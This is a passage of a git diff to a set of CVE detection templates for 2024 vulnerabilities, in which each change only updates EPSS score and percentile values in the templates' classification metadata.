a/http/cves/2024/CVE-2024-24763.yaml b/http/cves/2024/CVE-2024-24763.yaml index a3caaed020d..84037e3e8dd 100644 --- a/http/cves/2024/CVE-2024-24763.yaml +++ b/http/cves/2024/CVE-2024-24763.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-24763 cwe-id: CWE-601 epss-score: 0.26411 - epss-percentile: 0.96158 + epss-percentile: 0.96161 cpe: cpe:2.3:a:smartbear:swagger_ui:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2024/CVE-2024-24809.yaml b/http/cves/2024/CVE-2024-24809.yaml index a671db62eaf..ef94af91d83 100644 --- a/http/cves/2024/CVE-2024-24809.yaml +++ b/http/cves/2024/CVE-2024-24809.yaml @@ -19,8 +19,8 @@ info: cvss-score: 8.5 cve-id: CVE-2024-24809 cwe-id: CWE-27 - epss-score: 0.89894 - epss-percentile: 0.99551 + epss-score: 0.8926 + epss-percentile: 0.99521 cpe: cpe:2.3:a:traccar:traccar:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-24882.yaml b/http/cves/2024/CVE-2024-24882.yaml index 87b6ec3a0e0..7b4ddb7344d 100644 --- a/http/cves/2024/CVE-2024-24882.yaml +++ b/http/cves/2024/CVE-2024-24882.yaml @@ -19,8 +19,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-24882 - epss-score: 0.42373 - epss-percentile: 0.9734 + epss-score: 0.31535 + epss-percentile: 0.96641 cwe-id: CWE-269 cpe: cpe:2.3:a:themegrill:masteriyo:*:*:*:*:free:wordpress:*:* metadata: diff --git a/http/cves/2024/CVE-2024-25608.yaml b/http/cves/2024/CVE-2024-25608.yaml index 4ce0c461495..afca4569a17 100644 --- a/http/cves/2024/CVE-2024-25608.yaml +++ b/http/cves/2024/CVE-2024-25608.yaml @@ -19,8 +19,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2024-25608 - epss-score: 0.15402 - epss-percentile: 0.94434 + epss-score: 0.20737 + epss-percentile: 0.95419 cwe-id: CWE-601 cpe: cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*,cpe:2.3:a:liferay:liferay_portal:*:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2024/CVE-2024-25723.yaml b/http/cves/2024/CVE-2024-25723.yaml index d394916cfda..b12cd4c842f 100644 --- a/http/cves/2024/CVE-2024-25723.yaml +++ b/http/cves/2024/CVE-2024-25723.yaml @@ -18,7 +18,7 @@ info: - https://github.com/zenml-io/zenml/compare/0.44.3...0.44.4 classification: epss-score: 0.89644 - epss-percentile: 0.99538 + epss-percentile: 0.9954 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-25735.yaml b/http/cves/2024/CVE-2024-25735.yaml index a9d38b0bd6c..49df897eb1a 100644 --- a/http/cves/2024/CVE-2024-25735.yaml +++ b/http/cves/2024/CVE-2024-25735.yaml @@ -18,7 +18,7 @@ info: - https://github.com/codeb0ss/CVE-2024-25735-PoC classification: epss-score: 0.90779 - epss-percentile: 0.99602 + epss-percentile: 0.996 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-25852.yaml b/http/cves/2024/CVE-2024-25852.yaml index 948bfc6d8f2..b2040b5d5c9 100644 --- a/http/cves/2024/CVE-2024-25852.yaml +++ b/http/cves/2024/CVE-2024-25852.yaml @@ -14,8 +14,8 @@ info: - https://github.com/ZackSecurity/VulnerReport/blob/cve/Linksys/1.md - https://immense-mirror-b42.notion.site/Linksys-RE7000-command-injection-vulnerability-c1a47abf5e8d4dd0934d20d77da930bd classification: - epss-score: 0.93115 - epss-percentile: 0.99777 + epss-score: 0.93225 + epss-percentile: 0.99787 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-2621.yaml b/http/cves/2024/CVE-2024-2621.yaml index 720334ddfc4..65304ae5fa9 100644 --- a/http/cves/2024/CVE-2024-2621.yaml +++ b/http/cves/2024/CVE-2024-2621.yaml @@ -23,7 +23,7 @@ info: cve-id: CVE-2024-2621 cwe-id: CWE-89 epss-score: 0.1343 - epss-percentile: 0.93981 + epss-percentile: 0.93977 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-26331.yaml b/http/cves/2024/CVE-2024-26331.yaml index d7738515b0f..56dd8b5e3c6 100644 --- a/http/cves/2024/CVE-2024-26331.yaml +++ b/http/cves/2024/CVE-2024-26331.yaml @@ -17,7 +17,7 @@ info: - https://github.com/Ostorlab/KEV classification: epss-score: 0.67864 - epss-percentile: 0.98526 + epss-percentile: 0.98529 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-27564.yaml b/http/cves/2024/CVE-2024-27564.yaml index 2d1a9df2a15..f748a110207 100644 --- a/http/cves/2024/CVE-2024-27564.yaml +++ b/http/cves/2024/CVE-2024-27564.yaml @@ -15,7 +15,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2024-27564 classification: epss-score: 0.91075 - epss-percentile: 0.99623 + epss-percentile: 0.99621 cpe: cpe:2.3:a:chanzhaoyu:chatgpt_web:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-2771.yaml b/http/cves/2024/CVE-2024-2771.yaml index 1841aab4c1a..6d52f275d1d 100644 --- a/http/cves/2024/CVE-2024-2771.yaml +++ b/http/cves/2024/CVE-2024-2771.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2024-2771 cwe-id: CWE-862 epss-score: 0.2943 - epss-percentile: 0.96457 + epss-percentile: 0.96461 cpe: cpe:2.3:a:fluentforms:contact_form:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-27718.yaml b/http/cves/2024/CVE-2024-27718.yaml index ae2360d7e23..72c0fd47f3c 100644 --- a/http/cves/2024/CVE-2024-27718.yaml +++ b/http/cves/2024/CVE-2024-27718.yaml @@ -14,7 +14,7 @@ info: - https://github.com/tldjgggg/cve/blob/main/sql.md classification: epss-score: 0.06313 - epss-percentile: 0.90679 + epss-percentile: 0.9068 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-2782.yaml b/http/cves/2024/CVE-2024-2782.yaml index 67b7e2b1de6..af9380a56d0 100644 --- a/http/cves/2024/CVE-2024-2782.yaml +++ b/http/cves/2024/CVE-2024-2782.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2024-2782 cwe-id: CWE-862 epss-score: 0.10632 - epss-percentile: 0.93078 + epss-percentile: 0.93072 cpe: cpe:2.3:a:fluentforms:contact_form:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-27956.yaml b/http/cves/2024/CVE-2024-27956.yaml index e8241acf7b6..e74c3fa591e 100644 --- a/http/cves/2024/CVE-2024-27956.yaml +++ b/http/cves/2024/CVE-2024-27956.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2024-27956 cwe-id: CWE-89 epss-score: 0.93586 - epss-percentile: 0.99823 + epss-percentile: 0.99824 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-28200.yaml b/http/cves/2024/CVE-2024-28200.yaml index ff26b256e5f..01e0b502ca2 100644 --- a/http/cves/2024/CVE-2024-28200.yaml +++ b/http/cves/2024/CVE-2024-28200.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.1 cve-id: CVE-2024-28200 cwe-id: CWE-287 - epss-score: 0.28221 - epss-percentile: 0.96348 + epss-score: 0.51819 + epss-percentile: 0.9781 cpe: cpe:2.3:a:n-able:n-central:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-28253.yaml b/http/cves/2024/CVE-2024-28253.yaml index dea7d085efa..0dd966adaf6 100644 --- a/http/cves/2024/CVE-2024-28253.yaml +++ b/http/cves/2024/CVE-2024-28253.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2024-28253 cwe-id: CWE-94 epss-score: 0.9256 - epss-percentile: 0.99728 + epss-percentile: 0.99727 cpe: cpe:2.3:a:open-metadata:openmetadata:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2024/CVE-2024-28397.yaml b/http/cves/2024/CVE-2024-28397.yaml index fa2d0fff0af..d3aa540f49e 100644 --- a/http/cves/2024/CVE-2024-28397.yaml +++ b/http/cves/2024/CVE-2024-28397.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.3 cve-id: CVE-2024-28397 cwe-id: CWE-94 - epss-score: 0.69128 - epss-percentile: 0.98586 + epss-score: 0.67349 + epss-percentile: 0.9851 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-2862.yaml b/http/cves/2024/CVE-2024-2862.yaml index 6442e5bf875..417142c303b 100644 --- a/http/cves/2024/CVE-2024-2862.yaml +++ b/http/cves/2024/CVE-2024-2862.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-2862 - epss-score: 0.83275 - epss-percentile: 0.99245 + epss-score: 0.80981 + epss-percentile: 0.99113 cwe-id: CWE-640 metadata: verified: true diff --git a/http/cves/2024/CVE-2024-28623.yaml b/http/cves/2024/CVE-2024-28623.yaml index 7c2575ef041..ae532521474 100644 --- a/http/cves/2024/CVE-2024-28623.yaml +++ b/http/cves/2024/CVE-2024-28623.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-28623 cwe-id: CWE-79 epss-score: 0.006 - epss-percentile: 0.68853 + epss-percentile: 0.68842 cpe: cpe:2.3:a:ritecms:ritecms:3.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-2863.yaml b/http/cves/2024/CVE-2024-2863.yaml index d239f587d13..8500a478a66 100644 --- a/http/cves/2024/CVE-2024-2863.yaml +++ b/http/cves/2024/CVE-2024-2863.yaml @@ -14,8 +14,8 @@ info: cvss-score: 9.8 cve-id: CVE-2024-2863 cwe-id: CWE-22 - epss-score: 0.71004 - epss-percentile: 0.98657 + epss-score: 0.66109 + epss-percentile: 0.9846 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-28734.yaml b/http/cves/2024/CVE-2024-28734.yaml index 80678b04c10..cc4653f670c 100644 --- a/http/cves/2024/CVE-2024-28734.yaml +++ b/http/cves/2024/CVE-2024-28734.yaml @@ -17,7 +17,7 @@ info: - http://unit4.com classification: epss-score: 0.10931 - epss-percentile: 0.93183 + epss-percentile: 0.93178 metadata: max-request: 1 tags: packetstorm,cve,cve2024,coda,xss,vkev,vuln diff --git a/http/cves/2024/CVE-2024-29028.yaml b/http/cves/2024/CVE-2024-29028.yaml index b33302fc7df..66ccee603f2 100644 --- a/http/cves/2024/CVE-2024-29028.yaml +++ b/http/cves/2024/CVE-2024-29028.yaml @@ -19,7 +19,7 @@ info: cwe-id: CWE-918 cve-id: CVE-2024-29028 epss-score: 0.06339 - epss-percentile: 0.90694 + epss-percentile: 0.90695 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-29137.yaml b/http/cves/2024/CVE-2024-29137.yaml index fd0aa54f201..986b6fe35d6 100644 --- a/http/cves/2024/CVE-2024-29137.yaml +++ b/http/cves/2024/CVE-2024-29137.yaml @@ -19,8 +19,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L cvss-score: 7.1 cve-id: CVE-2024-29137 - epss-score: 0.06985 - epss-percentile: 0.91184 + epss-score: 0.05473 + epss-percentile: 0.89918 cwe-id: CWE-79 metadata: verified: true diff --git a/http/cves/2024/CVE-2024-29138.yaml b/http/cves/2024/CVE-2024-29138.yaml index 3fc306753c4..6be64674b46 100644 --- a/http/cves/2024/CVE-2024-29138.yaml +++ b/http/cves/2024/CVE-2024-29138.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2024-29138 - epss-score: 0.05507 - epss-percentile: 0.89954 + epss-score: 0.04432 + epss-percentile: 0.88697 cwe-id: CWE-79 metadata: verified: true diff --git a/http/cves/2024/CVE-2024-29198.yaml b/http/cves/2024/CVE-2024-29198.yaml index 08750b89c51..9beed0b2c66 100644 --- a/http/cves/2024/CVE-2024-29198.yaml +++ b/http/cves/2024/CVE-2024-29198.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2024-29198 cwe-id: CWE-918 epss-score: 0.05891 - epss-percentile: 0.90311 + epss-percentile: 0.90313 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-29269.yaml b/http/cves/2024/CVE-2024-29269.yaml index 0cb42b2d97f..d209306efe4 100644 --- a/http/cves/2024/CVE-2024-29269.yaml +++ b/http/cves/2024/CVE-2024-29269.yaml @@ -20,8 +20,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-29269 - epss-score: 0.93613 - epss-percentile: 0.99826 + epss-score: 0.93538 + epss-percentile: 0.99819 cpe: cpe:2.3:h:telesquare:tlr-2005ksh:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2024/CVE-2024-29272.yaml b/http/cves/2024/CVE-2024-29272.yaml index 3b2589c258e..4dfae84395c 100644 --- a/http/cves/2024/CVE-2024-29272.yaml +++ b/http/cves/2024/CVE-2024-29272.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.5 cve-id: CVE-2024-29272 cwe-id: CWE-434 - epss-score: 0.89261 - epss-percentile: 0.99521 + epss-score: 0.89639 + epss-percentile: 0.9954 cpe: cpe:2.3:a:vvvebjs:vvvebjs:1.7.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-2928.yaml b/http/cves/2024/CVE-2024-2928.yaml index fab3ed34cc1..f17d8c3643b 100644 --- a/http/cves/2024/CVE-2024-2928.yaml +++ b/http/cves/2024/CVE-2024-2928.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2024-2928 cwe-id: CWE-29 - epss-score: 0.91419 - epss-percentile: 0.99643 + epss-score: 0.90994 + epss-percentile: 0.99616 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-29792.yaml b/http/cves/2024/CVE-2024-29792.yaml index f0008307d61..2641e59742f 100644 --- a/http/cves/2024/CVE-2024-29792.yaml +++ b/http/cves/2024/CVE-2024-29792.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2024-29792 - epss-score: 0.13022 - epss-percentile: 0.93869 + epss-score: 0.0548 + epss-percentile: 0.89927 cwe-id: CWE-79 metadata: verified: true diff --git a/http/cves/2024/CVE-2024-29824.yaml b/http/cves/2024/CVE-2024-29824.yaml index b89a01dc9ea..44ea19e81a9 100644 --- a/http/cves/2024/CVE-2024-29824.yaml +++ b/http/cves/2024/CVE-2024-29824.yaml @@ -20,7 +20,7 @@ info: cvss-score: 9.6 cve-id: CVE-2024-29824 epss-score: 0.94089 - epss-percentile: 0.99901 + epss-percentile: 0.99899 metadata: max-request: 1 tags: cve,cve2024,ivanti,epm,sqli,rce,kev,vkev,vuln diff --git a/http/cves/2024/CVE-2024-29868.yaml b/http/cves/2024/CVE-2024-29868.yaml index f98b9935af8..f1121a164f3 100644 --- a/http/cves/2024/CVE-2024-29868.yaml +++ b/http/cves/2024/CVE-2024-29868.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-29868 cwe-id: CWE-338 epss-score: 0.74201 - epss-percentile: 0.98793 + epss-percentile: 0.98791 cpe: cpe:2.3:a:apache:streampipes:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2024/CVE-2024-29889.yaml b/http/cves/2024/CVE-2024-29889.yaml index f9a5bbe2a7e..6a7e401eed5 100644 --- a/http/cves/2024/CVE-2024-29889.yaml +++ b/http/cves/2024/CVE-2024-29889.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.1 cve-id: CVE-2024-29889 cwe-id: CWE-89 - epss-score: 0.55449 - epss-percentile: 0.9799 + epss-score: 0.53629 + epss-percentile: 0.97898 cpe: cpe:2.3:a:glpi-project:glpi:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-29931.yaml b/http/cves/2024/CVE-2024-29931.yaml index fa0a7934b5d..ab57c12c74d 100644 --- a/http/cves/2024/CVE-2024-29931.yaml +++ b/http/cves/2024/CVE-2024-29931.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2024-29931 - epss-score: 0.10475 - epss-percentile: 0.93023 + epss-score: 0.05462 + epss-percentile: 0.89908 cwe-id: CWE-79 metadata: verified: true diff --git a/http/cves/2024/CVE-2024-29972.yaml b/http/cves/2024/CVE-2024-29972.yaml index 387eadd84e5..f7b2d59808b 100644 --- a/http/cves/2024/CVE-2024-29972.yaml +++ b/http/cves/2024/CVE-2024-29972.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-29972 cwe-id: CWE-78 epss-score: 0.92597 - epss-percentile: 0.99731 + epss-percentile: 0.9973 cpe: cpe:2.3:o:zyxel:nas326_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-29973.yaml b/http/cves/2024/CVE-2024-29973.yaml index ecd05d371c3..7eeaaad27d0 100644 --- a/http/cves/2024/CVE-2024-29973.yaml +++ b/http/cves/2024/CVE-2024-29973.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2024-29973 cwe-id: CWE-78 epss-score: 0.94082 - epss-percentile: 0.99899 + epss-percentile: 0.99898 cpe: cpe:2.3:o:zyxel:nas326_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-30163.yaml b/http/cves/2024/CVE-2024-30163.yaml index f905972057c..6e2a19ea338 100644 --- a/http/cves/2024/CVE-2024-30163.yaml +++ b/http/cves/2024/CVE-2024-30163.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2024-30163 cwe-id: CWE-89 epss-score: 0.46372 - epss-percentile: 0.97555 + epss-percentile: 0.97551 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 metadata: diff --git a/http/cves/2024/CVE-2024-30194.yaml b/http/cves/2024/CVE-2024-30194.yaml index 6a2048faa69..45fe617c10b 100644 --- a/http/cves/2024/CVE-2024-30194.yaml +++ b/http/cves/2024/CVE-2024-30194.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2024-30194 - epss-score: 0.11985 - epss-percentile: 0.93558 + epss-score: 0.06315 + epss-percentile: 0.90681 cwe-id: CWE-79 metadata: verified: true diff --git a/http/cves/2024/CVE-2024-30269.yaml b/http/cves/2024/CVE-2024-30269.yaml index 3f7e3631d97..a0046097272 100644 --- a/http/cves/2024/CVE-2024-30269.yaml +++ b/http/cves/2024/CVE-2024-30269.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2024-30269 cwe-id: CWE-200 epss-score: 0.92096 - epss-percentile: 0.99692 + epss-percentile: 0.9969 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-3032.yaml b/http/cves/2024/CVE-2024-3032.yaml index 22672cec83f..fe2c367c548 100644 --- a/http/cves/2024/CVE-2024-3032.yaml +++ b/http/cves/2024/CVE-2024-3032.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-3032 cwe-id: CWE-601 epss-score: 0.02477 - epss-percentile: 0.84882 + epss-percentile: 0.84877 cpe: cpe:2.3:a:themify:builder:*:*:*:*:-:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2024/CVE-2024-30569.yaml b/http/cves/2024/CVE-2024-30569.yaml index cc2fe8f4c07..2b6c16765ad 100644 --- a/http/cves/2024/CVE-2024-30569.yaml +++ b/http/cves/2024/CVE-2024-30569.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2024-30569 cwe-id: CWE-200 epss-score: 0.21139 - epss-percentile: 0.95478 + epss-percentile: 0.95479 cpe: cpe:2.3:o:netgear:r6850_firmware:1.1.0.88:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-30570.yaml b/http/cves/2024/CVE-2024-30570.yaml index d16a63ef629..cfcd4f3d3d1 100644 --- a/http/cves/2024/CVE-2024-30570.yaml +++ b/http/cves/2024/CVE-2024-30570.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-30570 cwe-id: CWE-200 epss-score: 0.12265 - epss-percentile: 0.9364 + epss-percentile: 0.93635 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-3097.yaml b/http/cves/2024/CVE-2024-3097.yaml index d87ed6062d2..e7e59f996ec 100644 --- a/http/cves/2024/CVE-2024-3097.yaml +++ b/http/cves/2024/CVE-2024-3097.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2024-3097 cwe-id: CWE-862 epss-score: 0.27418 - epss-percentile: 0.9626 + epss-percentile: 0.96263 cpe: cpe:2.3:a:imagely:nextgen_gallery:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2024/CVE-2024-3136.yaml b/http/cves/2024/CVE-2024-3136.yaml index 557c3647637..fcb275d2268 100644 --- a/http/cves/2024/CVE-2024-3136.yaml +++ b/http/cves/2024/CVE-2024-3136.yaml @@ -20,7 +20,7 @@ info: cvss-score: 9.8 cve-id: CVE-2024-3136 epss-score: 0.45313 - epss-percentile: 0.97496 + epss-percentile: 0.97491 cpe: cpe:2.3:a:stylemixthemes:masterstudy_lms:*:*:*:*:wordpress:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-31621.yaml b/http/cves/2024/CVE-2024-31621.yaml index d2df7317923..e5425f25c24 100644 --- a/http/cves/2024/CVE-2024-31621.yaml +++ b/http/cves/2024/CVE-2024-31621.yaml @@ -16,7 +16,7 @@ info: - https://flowiseai.com/ classification: epss-score: 0.80162 - epss-percentile: 0.99072 + epss-percentile: 0.99074 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-31849.yaml b/http/cves/2024/CVE-2024-31849.yaml index efd26835c38..226ab447330 100644 --- a/http/cves/2024/CVE-2024-31849.yaml +++ b/http/cves/2024/CVE-2024-31849.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2024-31849 cwe-id: CWE-22 epss-score: 0.90996 - epss-percentile: 0.99618 + epss-percentile: 0.99616 metadata: verified: true max-request: 2 diff --git a/http/cves/2024/CVE-2024-31982.yaml b/http/cves/2024/CVE-2024-31982.yaml index 89d092ca09e..a952c0d4b71 100644 --- a/http/cves/2024/CVE-2024-31982.yaml +++ b/http/cves/2024/CVE-2024-31982.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2024-31982 cwe-id: CWE-95 epss-score: 0.94247 - epss-percentile: 0.99924 + epss-percentile: 0.99923 cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2024/CVE-2024-32113.yaml b/http/cves/2024/CVE-2024-32113.yaml index 324398aae7e..b25d63512fe 100644 --- a/http/cves/2024/CVE-2024-32113.yaml +++ b/http/cves/2024/CVE-2024-32113.yaml @@ -23,7 +23,7 @@ info: cwe-id: CWE-22 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H epss-score: 0.93963 - epss-percentile: 0.99877 + epss-percentile: 0.99876 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-32231.yaml b/http/cves/2024/CVE-2024-32231.yaml index a6bbc44d0b9..002e1f587e8 100644 --- a/http/cves/2024/CVE-2024-32231.yaml +++ b/http/cves/2024/CVE-2024-32231.yaml @@ -18,8 +18,8 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2024-32231 classification: cve-id: CVE-2024-32231 - epss-score: 0.04079 - epss-percentile: 0.88227 + epss-score: 0.03091 + epss-percentile: 0.86401 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-32238.yaml b/http/cves/2024/CVE-2024-32238.yaml index 166657e3bbd..b53fe6b66d1 100644 --- a/http/cves/2024/CVE-2024-32238.yaml +++ b/http/cves/2024/CVE-2024-32238.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2024-32238 cwe-id: CWE-522 - epss-score: 0.90863 - epss-percentile: 0.99609 + epss-score: 0.88733 + epss-percentile: 0.99492 metadata: verified: true max-request: 2 diff --git a/http/cves/2024/CVE-2024-3234.yaml b/http/cves/2024/CVE-2024-3234.yaml index afb73235189..ab6d4bfb3b5 100644 --- a/http/cves/2024/CVE-2024-3234.yaml +++ b/http/cves/2024/CVE-2024-3234.yaml @@ -15,8 +15,8 @@ info: cvss-score: 9.8 cve-id: CVE-2024-3234 cwe-id: CWE-22 - epss-score: 0.69547 - epss-percentile: 0.986 + epss-score: 0.66518 + epss-percentile: 0.98476 cpe: cpe:2.3:a:gaizhenbiao:chuanhuchatgpt:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-32399.yaml b/http/cves/2024/CVE-2024-32399.yaml index 686111e7e1e..d0b20b94003 100644 --- a/http/cves/2024/CVE-2024-32399.yaml +++ b/http/cves/2024/CVE-2024-32399.yaml @@ -17,8 +17,8 @@ info: - https://github.com/NN0b0dy/CVE-2024-32399 - https://github.com/nomi-sec/PoC-in-GitHub classification: - epss-score: 0.85263 - epss-percentile: 0.99326 + epss-score: 0.83509 + epss-percentile: 0.99255 cpe: cpe:2.3:a:raidenmaild:raidenmaild:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-32651.yaml b/http/cves/2024/CVE-2024-32651.yaml index c820d0a37ae..0d727ff5719 100644 --- a/http/cves/2024/CVE-2024-32651.yaml +++ b/http/cves/2024/CVE-2024-32651.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2024-32651 cwe-id: CWE-1336 epss-score: 0.92464 - epss-percentile: 0.99719 + epss-percentile: 0.99718 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-3273.yaml b/http/cves/2024/CVE-2024-3273.yaml index 402950b0f00..a3b0f964277 100644 --- a/http/cves/2024/CVE-2024-3273.yaml +++ b/http/cves/2024/CVE-2024-3273.yaml @@ -22,7 +22,7 @@ info: cwe-id: CWE-77 cpe: cpe:2.3:o:dlink:dns-320l_firmware:-:*:*:*:*:*:*:* epss-score: 0.94425 - epss-percentile: 0.9998 + epss-percentile: 0.99979 metadata: verified: true vendor: dlink diff --git a/http/cves/2024/CVE-2024-32735.yaml b/http/cves/2024/CVE-2024-32735.yaml index 063cbee13b2..6f2ba4859a3 100644 --- a/http/cves/2024/CVE-2024-32735.yaml +++ b/http/cves/2024/CVE-2024-32735.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2024-32735 cwe-id: CWE-306 epss-score: 0.74678 - epss-percentile: 0.98811 + epss-percentile: 0.9881 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-32737.yaml b/http/cves/2024/CVE-2024-32737.yaml index 95b8b625920..92dbed22acd 100644 --- a/http/cves/2024/CVE-2024-32737.yaml +++ b/http/cves/2024/CVE-2024-32737.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2024-32737 cwe-id: CWE-89 epss-score: 0.37786 - epss-percentile: 0.97079 + epss-percentile: 0.97081 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-32738.yaml b/http/cves/2024/CVE-2024-32738.yaml index 3fe751fb055..15a6e729d0e 100644 --- a/http/cves/2024/CVE-2024-32738.yaml +++ b/http/cves/2024/CVE-2024-32738.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2024-32738 cwe-id: CWE-89 epss-score: 0.499 - epss-percentile: 0.97725 + epss-percentile: 0.97719 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-32964.yaml b/http/cves/2024/CVE-2024-32964.yaml index 1a477db48ed..cf28bb0819d 100644 --- a/http/cves/2024/CVE-2024-32964.yaml +++ b/http/cves/2024/CVE-2024-32964.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2024-32964 cwe-id: CWE-918 epss-score: 0.53733 - epss-percentile: 0.97909 + epss-percentile: 0.97906 metadata: verified: true max-request: 2 diff --git a/http/cves/2024/CVE-2024-3300.yaml b/http/cves/2024/CVE-2024-3300.yaml index 873cfb94f03..09be59a6a34 100644 --- a/http/cves/2024/CVE-2024-3300.yaml +++ b/http/cves/2024/CVE-2024-3300.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-3300 cwe-id: CWE-502 epss-score: 0.39776 - epss-percentile: 0.97191 + epss-percentile: 0.9719 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-33113.yaml b/http/cves/2024/CVE-2024-33113.yaml index 03b8df5ff61..6160d3453eb 100644 --- 